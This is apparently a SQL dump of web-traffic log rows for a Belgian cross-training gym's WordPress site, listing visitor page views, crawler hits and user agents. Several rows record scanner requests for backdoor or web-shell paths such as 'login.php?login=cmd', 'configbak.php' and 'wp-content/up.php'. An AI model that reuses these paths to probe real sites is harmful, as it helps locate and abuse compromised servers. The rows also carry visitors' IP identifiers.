(71307, 1493816865.604260, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71308, 1493816880.203083, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71309, 1493816881.076787, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71310, 1493816882.392036, 2644818889, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71311, 1493816883.281792, 2644818889, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0'),
(71312, 1493816940.471394, 1837372382, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71313, 1493816942.661975, 1837372382, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71314, 1493816996.107472, 1837372382, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0'),
(71315, 1493817159.331727, 676177851, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71316, 1493817912.510589, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/script.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71317, 1493821284.664529, 3475901753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71318, 1493821285.180198, 3475901753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71319, 1493823694.250645, 757109195, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71320, 1493823696.503185, 757109195, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71321, 1493827022.327997, 1837274001, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71322, 1493827025.028087, 1837274001, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71323, 1493827085.049708, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71324, 1493827085.500816, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71325, 1493827085.908025, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71326, 1493827086.320749, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71327, 1493827086.827101, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71328, 1493827087.442293, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71329, 1493827087.933602, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71330, 1493827088.369967, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71331, 1493827088.779889, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71332, 1493827089.291993, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71333, 1493827089.999883, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71334, 1493827090.796532, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71335, 1493827091.301967, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71336, 1493827091.976351, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71337, 1493827633.723735, 876263692, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71338, 1493827636.599853, 876263692, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(71339, 1493829865.926812, 1837274001, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71340, 1493829914.994690, 1837274001, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71341, 1493830036.834954, 1837274001, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(71342, 1493830400.420870, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/up.php', 'http://www.crosstrainingcenter.be/wp-content/up.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71343, 1493831678.928018, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71344, 1493831679.474646, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71345, 1493831680.075839, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71346, 1493831680.570288, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71347, 1493831681.286724, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71348, 1493834017.302446, 2366158608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71349, 1493834447.326974, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/configbak.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71350, 1493836094.687404, 1837482126, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G361F Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36'),
(71351, 1493836097.266742, 1837482126, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G361F Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36'),
(71352, 1493840719.171070, 3024883474, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71353, 1493842216.063122, 1054099761, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(71354, 1493842582.206143, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71355, 1493842582.828480, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71356, 1493842583.247086, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71357, 1493842583.667571, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71358, 1493842584.144461, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71359, 1493842584.564432, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71360, 1493842584.966314, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71361, 1493842585.731896, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71362, 1493842586.141578, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71363, 1493842586.560428, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71364, 1493842586.989467, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71365, 1493842587.618004, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71366, 1493842588.177095, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71367, 1493842588.653901, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71368, 1493852118.995476, 1439290282, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1'),
(71369, 1493852302.912143, 1439290282, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1'),
(71370, 1493852715.196706, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71371, 1493852720.104730, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71372, 1493856148.882477, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71373, 1493859927.134361, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/'),
(71374, 1493860036.440780, 2584750011, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71375, 1493861628.620345, 3427775492, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.bing.com/search?q=cross+training+origine&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)'),
(71376, 1493864135.043063, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.99.36 (KHTML, like Gecko) Version/5.3.8 Safari/531.72'),
(71377, 1493864137.534692, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.99.36 (KHTML, like Gecko) Version/5.3.8 Safari/531.72'),
(71378, 1493864663.538298, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71379, 1493864664.244387, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71380, 1493864665.353212, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71381, 1493865054.639162, 1427728186, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71382, 1493865068.795789, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71383, 1493865073.342517, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71384, 1493865081.780387, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71385, 1493865088.013667, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71386, 1493865093.964720, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71387, 1493865098.563605, 1427728186, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71388, 1493865103.727697, 1427728186, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)'),
(71389, 1493871303.814614, 3281714082, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/login.php?login=cmd', 'http://www.crosstrainingcenter.be/login.php?login=cmd', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71390, 1493871867.880906, 1406737396, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2696.61 Safari/537.36'),
(71391, 1493879719.393588, 3112277173, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/xmirpc.php?u=1', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71392, 1493881503.332826, 520974919, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(71393, 1493894526.441127, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71394, 1493894526.971684, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71395, 1493902066.319265, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/upload.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71396, 1493902463.000239, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71397, 1493904858.614132, 2760155448, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71398, 1493904893.599915, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71399, 1493908005.653871, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.bing.com/search?q=cross+training+center+namur&src=IE-SearchBox&FORM=IENTSR', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(71400, 1493908007.390290, 3267064321, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(71401, 1493908480.072780, 676177775, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71402, 1493908485.172525, 676177851, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71403, 1493908496.776145, 3475901753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71404, 1493908497.307116, 3475901753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71405, 1493908497.880991, 3475901753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71406, 1493909511.615530, 1538308269, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(71407, 1493909512.789392, 1538308269, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(71408, 1493909513.197927, 1538308269, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(71409, 1493909562.827632, 1538308269, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(71410, 1493912878.788495, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71411, 1493914851.513698, 1078646641, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '\\\'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\\\''),
(71412, 1493915013.469710, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71413, 1493915014.078132, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71414, 1493915014.565605, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71415, 1493915015.072788, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71416, 1493915015.675076, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71417, 1493915016.141287, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71418, 1493915016.745179, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71419, 1493915017.550616, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71420, 1493915018.133025, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71421, 1493915019.239698, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71422, 1493915020.594304, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71423, 1493915021.877014, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71424, 1493915022.661357, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71425, 1493915024.286498, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71426, 1493917778.690710, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
